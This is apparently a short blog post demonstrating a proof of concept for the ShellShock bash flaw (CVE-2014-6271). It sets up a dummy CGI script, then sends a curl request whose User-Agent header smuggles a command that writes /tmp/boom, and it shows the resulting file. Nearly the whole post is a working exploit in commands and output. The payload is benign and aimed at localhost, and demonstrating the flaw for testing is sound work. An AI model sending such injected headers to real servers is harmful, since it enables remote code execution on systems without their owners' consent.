CVE-2014-6271 (ShellShock) remote code execution PoC

create a file for cgi execution
vi dummy.sh

fill with sample innocent code
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo "dummy output"

execute it
curl -H 'User-Agent: () { :;}; echo boom>/tmp/boom'  http://localhost/cgi-bin/dummy.sh
dummy output

and see if the file is created
ls -l /tmp/boom
-rw-r--r--. 1 apache apache 5 Sep 25 21:20 /tmp/boom
 

1 thought on “CVE-2014-6271 (ShellShock) remote code execution PoC”

Leave a Reply